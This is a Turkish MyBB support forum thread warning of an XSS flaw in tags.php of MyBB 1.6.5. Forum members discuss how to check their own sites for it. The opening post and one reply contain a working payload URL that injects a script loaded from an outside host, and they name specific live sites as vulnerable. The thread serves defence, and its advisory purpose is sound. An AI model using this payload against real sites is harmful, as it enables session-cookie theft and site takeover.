Mybb Hakkında Soru ve Sorunlarız, Yardım ve Destek için MybbDepo external Adresini Ziyaret Ediniz.
Sponsor Reklam

duyuru Güncel Duyurular!
Güncel MyBB Dökümanları.. Güncel + Orijinal MyBB Sürümleri..
bilgi mybb

Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5

Derecelendirme: 5/5 - 1 oy
[1.6] Basit etiket sistemindeki Güvenlik Zaafiyeti !
#1
Güvenlik 
Selamlar.

25/12/2011 Tarihinde myBB 1.6.5 Sisteminde Bug Researcher'lar Tarafından Xss (Cross Site Scripting) Açığı Keşfedildi.

Neler Yapılabilir? ;

Yönlendirme Yapılarak Siteniz Hacklenebilir, Session (Çerez-Oturum) Bilgileri Çalınabilir.

Güvenlik Açığı Oluşturan Dosyalarım Hangileri? ;

Şu Ana Kadar Sadece Tags.php'de Tespit Edildi.

Açığı Kapatmak İçin Neler Yapabilirim ?

Yazdığım Güvenlik Önlemleri Dökümanında Açıklarınızı Kapatmak İçin Yollar Keşfedebilirsiniz.

Güvenlik Önlemleri [Mybb]

Açıklı Sitelerden Bir Örnek ;

Kod:
http://ertebat.in/forum/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

Yukarıdaki Sitede Zaafiyet Mevcuttur.

Siz de, Forum Url'nizin Sonunda Alttaki Kodu Ekleyerek, Açık Olup Olmadığını Kontrol Edebilirsiniz,En Basit Yolu Bu .

Kod:
tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

Açıklarınızı Kapamak İçin Linkte Verdiğim Dökümanı Okuyunuz, Anlamadığınız Takdirde Yardımımı Esirgemem.

Açıklarınızı Kapamanız Dileğiyle.

Şu Anda, Türk Platformlarında Bu Açığı Yayınlayan Tek Yayın Organı Mybb.Com.TR' Dir.

myBB.Com.Tr Farkı ile, 3spi0n Sundu.
Ara
#2
Bilgilendirme için teşekkürler hocam. Ben sitemde denediğimde 404 hata sayfası alıyorum. Temiz miyim sizce?

Kod:
http://www.ebaydestek.com/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E
Ara
#3
(03.01.2012, Saat: 02:46)grdiyan Adlı Kullanıcıdan Alıntı: Bilgilendirme için teşekkürler hocam. Ben sitemde denediğimde 404 hata sayfası alıyorum. Temiz miyim sizce?

Kod:
http://www.ebaydestek.com/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

Sorun olduğunu zannetmiyorum arkadaşım, zaten kendini belli ediyor yönlenenler örnekteki gibi (:

Sıkıntı olur ise, buralardayız biz.

Ara
#4
Hocam bu tagı yazınca ne çıkınca site açık olmuş oluyor?
Ara
#5
(03.01.2012, Saat: 02:51)vforvendetta Adlı Kullanıcıdan Alıntı: Hocam bu tagı yazınca ne çıkınca site açık olmuş oluyor?

Örnek siteye bakarsan, anlarsın kardeşim.
Ara
#6
Bende dahili bir mysql hatası verdi bu açık var anlamına mı gelir?
Ara
#7
Hocam eğer bu tagı yazınca sitenizin görünümü açılıyorsa örnekteki şekilde Ünlem sitenizde açık mevcuttur, diyor arkadaşımız ve bunun için Güvenlik Önlemleri katagorisinden yararlanabilirsiniz.
Ara

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
Güvenlik [Bilgi] ChangUonDyu sohbet güvenlik tedbirleri [Ders] 007combatant 16 38,823 22.04.2012, Saat: 22:00
Son Yorum: 007combatant



Konuyu Okuyanlar: 1 Ziyaretçi
© 2009-2019 MyBB.Com.TR Internet Hizmetleri, MyBBGrup.Com Alt Kuruluşudur.

Web sitemiz dahilindeki tüm sayfalar, bu sayfaları gösteren tüm ekranlar ve içerdiği her türlü bilgi ve bağlı materyal, yerleşim ve öğeler, (çözüm ortaklarının logoları ve yasal hakları hariç) MyBB.Com.TR'ye aittir.
Yazılı izin olmaksızın ve kaynak belirtilmedikçe, (Kaynak göstererek alıntı yapılabilir.) kopyalanamaz ya da yayınlanamaz. MyBB.Com.TR sitesindeki içerik-ler 5070 sayılı kanun kapsamında dijital zaman damgasıyla ve DMCA tarafından korunmaktadır.
Tüm hakları, (insafiyet ile) saklıdır.
teknoloji forumu , haber